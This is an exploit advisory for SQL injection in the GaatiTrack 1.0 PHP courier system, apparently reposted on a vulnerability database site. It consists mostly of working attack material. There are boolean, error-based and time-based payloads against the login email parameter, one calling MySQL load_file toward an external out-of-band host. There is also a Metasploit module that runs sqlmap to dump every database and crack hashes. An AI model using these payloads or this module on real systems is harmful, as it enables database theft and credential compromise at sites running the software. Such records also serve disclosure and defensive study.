Vulners
Lucene search
📄 GaatiTrack 1.0 SQL Injection
# Titles: GaatiTrack-1.0 Copyright©2025-Multiple-SQLi - Metasploit module
# Author: nu11secur1ty
# Date: 10/06/2025
# Vendor: https://www.mayurik.com/
# Software:
https://www.sourcecodester.com/php/16848/best-courier-management-system-project-php.html
# Reference: https://portswigger.net/web-security/sql-injection
## Description:
The `email` parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select load_file('\\\\
geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+' was
submitted in the email parameter. This payload injects a SQL sub-query that
calls MySQL's load_file function with a UNC file path that references a URL
on an external domain. The application interacted with that domain,
indicating that the injected SQL query was executed.
STATUS: HIGH-CRITICAL Vulnerability
[+]Payload:
- SQLi:
```SQLi
---
Parameter: email (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery -
comment)
Payload: [email protected]'+(select load_file('\\\\
geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'' AND
3077=(SELECT (CASE WHEN (3077=3077) THEN 3077 ELSE (SELECT 5162 UNION
SELECT 5005) END))-- -&password=r5I!g0t!W9
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: [email protected]'+(select load_file('\\\\
geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'' AND (SELECT
5507 FROM(SELECT COUNT(*),CONCAT('qkqqq',(SELECT
(ELT(5507=5507,1))),'qxxpq',FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- YcNj&password=r5I!g0t!W9
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: [email protected]'+(select load_file('\\\\
geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'' AND (SELECT
2855 FROM (SELECT(SLEEP(11)))jpbI)-- jtuB&password=r5I!g0t!W9
---
```
[+]MSF exploit:
```rb
##
# gaati.rb
#
# Author: nu11secur1ty
# Description: gaati-sqli
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
'Name' => 'gaati',
'Description' => 'gaati-sqli',
'Author' => ['nu11secur1ty'],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('RAW_REQUEST', [ true, 'Raw HTTP request (from
Burp)', '' ]),
OptString.new('SQLMAP_PATH', [ false, 'Full path to sqlmap.py',
'/home/kali/sqlmap-nu11secur1ty/sqlmap.py' ])
]
)
end
def run
raw_request = datastore['RAW_REQUEST']
sqlmap_path = datastore['SQLMAP_PATH'] ||
'/home/kali/sqlmap-nu11secur1ty/sqlmap.py'
if raw_request.nil? || raw_request.empty?
print_error("RAW_REQUEST is empty — will attempt to use system
exploit.txt if present.")
end
# Prefer system exploit.txt in MSF module dir (no need to cat)
system_exploit =
'/usr/share/metasploit-framework/modules/auxiliary/MSF/exploit.txt'
use_file = nil
if File.exist?(system_exploit)
use_file = system_exploit
print_good("Using existing exploit file: #{use_file}")
else
# fallback: write to user-writable home dir
exploit_dir = File.join(Dir.home, ".msf_exploits")
Dir.mkdir(exploit_dir) unless Dir.exist?(exploit_dir)
timestamp = Time.now.strftime("%Y%m%d%H%M%S")
tmp_file = File.join(exploit_dir, "exploit_#{timestamp}.txt")
if raw_request.nil? || raw_request.empty?
print_error("No RAW_REQUEST provided and no system exploit.txt
found — nothing to do.")
return
end
begin
File.open(tmp_file, "w") { |f| f.write(raw_request) }
print_good("Saved RAW_REQUEST -> #{tmp_file}")
use_file = tmp_file
rescue Errno::EACCES => e
print_error("Cannot write temp exploit file: #{e}")
return
rescue => e
print_error("Failed to save temp request: #{e}")
return
end
end
unless File.exist?(sqlmap_path)
print_error("sqlmap.py not found at #{sqlmap_path}. Set SQLMAP_PATH
option to correct path.")
# do not delete the temp file so user can inspect
return
end
sqlmap_cmd = [
"python3",
sqlmap_path,
"-r", use_file,
"--no-cast",
"--no-escape",
"--dbms=mysql",
"--time-sec=11",
"--random-agent",
"--level=5",
"--risk=3",
"--batch",
"--flush-session",
"--technique=TBEUSQ",
"--union-char=UCHAR",
'--answers="crack=Y,dict=Y,continue=Y,quit=N"',
"--dump-all"
].join(" ")
print_status("Executing sqlmap: #{sqlmap_cmd}")
begin
system(sqlmap_cmd)
print_good("sqlmap finished (check output above)")
rescue => e
print_error("Failed to execute sqlmap: #{e}")
ensure
# delete tmp file if we created it
if use_file != system_exploit
begin
File.delete(use_file) if File.exist?(use_file)
print_status("Deleted temporary file #{use_file}")
rescue => e
print_warning("Could not delete temporary file: #{e}")
end
end
end
end
end
```
# Reproduce:
[href](https://www.patreon.com/posts/gaatitrack-1-0-140566642)
# Buy an exploit only:
[href](https://www.patreon.com/posts/gaatitrack-1-0-140566642)
# Time spent:
01:15:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Oct 2025 00:00Current
8.5High risk
Vulners AI Score8.5